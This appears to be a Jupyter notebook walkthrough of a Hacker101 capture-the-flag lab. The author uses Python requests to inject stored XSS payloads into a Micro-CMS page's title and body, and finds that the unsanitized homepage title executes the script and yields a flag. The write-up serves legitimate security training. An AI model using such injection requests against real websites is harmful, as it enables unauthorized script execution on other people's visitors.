In [10]:
import requests, time

url = "https://2155e7292db5f7b30e663b3aee95c7e8.ctf.hacker101.com/" # Home page

session = requests.Session()

Get the homepage

In [11]:
response = session.get(url)
print(response.text)

time.sleep(1) # Wait for 1 second


<!doctype html>
<html>
    <head>
        <title>Micro-CMS</title>
    </head>
    <body>
        <ul>
<li><a href="page/1">Testing</a></li>
<li><a href="page/2">Markdown Test</a></li>
        </ul>
        <a href="page/create">Create a new page</a>
    </body>
</html>



The response is:
```html
<!doctype html>
<html>
    <head>
        <title>Micro-CMS</title>
    </head>
    <body>
        <ul>
<li><a href="page/1">Testing</a></li>
<li><a href="page/2">Markdown Test</a></li>
        </ul>
        <a href="page/create">Create a new page</a>
    </body>
</html>
```

I try to access the "Testing page"

In [12]:
response = session.get(url + "page/1")
print(response.text)
time.sleep(1) # Wait for 1 second


<!doctype html>
<html>
    <head>
        <title>Testing</title>
    </head>
    <body>
        <a href="../">&lt;-- Go Home</a><br>
        <a href="edit/1">Edit this page</a>
        <h1>Testing</h1>
<h1>Woo</h1>
<p>Testing out this new micro-CMS!</p>
    </body>
</html>



The response is:
```html
<!doctype html>
<html>
    <head>
        <title>Testing</title>
    </head>
    <body>
        <a href="../">&lt;-- Go Home</a><br>
        <a href="edit/1">Edit this page</a>
        <h1>Testing</h1>
<h1>Woo</h1>
<p>Testing out this new micro-CMS!</p>
    </body>
</html>
```

I am able to edit the page's content. I try to inject script tag both in the title and the body -> **Stored XSS**

New title: ```<script>alert(1);</script>```
New body: ```<script>alert(2);</script>```

In [13]:
response = session.post(url + "page/edit/1", data= {"title": "<script>alert(1);</script>", "body": "<script>alert(2);</script>"}, headers={"Content-Type": "application/x-www-form-urlencoded", 'User-Agent': 'Mozilla/5.0 (Linux; Android) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36 CrKey/1.54.248666'})
time.sleep(1) # Wait for 1 second

response = requests.get(url + "page/1")
print(response.text)
time.sleep(1) # Wait for 1 second

200

<!doctype html>
<html>
    <head>
        <title>&lt;script&gt;alert(1);&lt;/script&gt;</title>
    </head>
    <body>
        <a href="../">&lt;-- Go Home</a><br>
        <a href="edit/1">Edit this page</a>
        <h1>&lt;script&gt;alert(1);&lt;/script&gt;</h1>
<scrubbed>alert(2);</scrubbed>
    </body>
</html>



The response is:
```html
<!doctype html>
<html>
    <head>
        <title>&lt;script&gt;alert(1);&lt;/script&gt;</title>
    </head>
    <body>
        <a href="../">&lt;-- Go Home</a><br>
        <a href="edit/1">Edit this page</a>
        <h1>&lt;script&gt;alert(1);&lt;/script&gt;</h1>
	<scrubbed>alert(2);</scrubbed>
    </body>
</html>
```

Unluckily, the injected code has not been executed in the "/page/1". However, even if the body has been correctly sanitized, the title still contains the encoded versions of < >. So, the < > are still there, but in a different format. Moreover, I can see through DevTools that the web site does not include any CSP directive.

I want to try what is going to be showed in the homepage (considering that I changed the title of the testing page).

In [14]:
response = requests.get(url)
print(response.text)
time.sleep(1) # Wait for 1 second


<!doctype html>
<html>
    <head>
        <title>Micro-CMS</title>
    </head>
    <body>
        <ul>
<li><a href="page/1"><script>alert("^FLAG^eeed36e5fdc5a8d74ffa3742142f7a42f6374ed2ea9c5e454419189b643b41a5$FLAG$");</script><script>alert(1);</script></a></li>
<li><a href="page/2">Markdown Test</a></li>
        </ul>
        <a href="page/create">Create a new page</a>
    </body>
</html>



Response:
```html
<!doctype html>
<html>
    <head>
        <title>Micro-CMS</title>
    </head>
    <body>
        <ul>
<li><a href="page/1"><script>alert("^FLAG^...$FLAG$");</script><script>alert(1);</script></a></li>
<li><a href="page/2">Markdown Test</a></li>
        </ul>
        <a href="page/create">Create a new page</a>
    </body>
</html>
```

YES! The sanitation of the homepage is not implemented! One flag caught!



TO BE CONTINUED......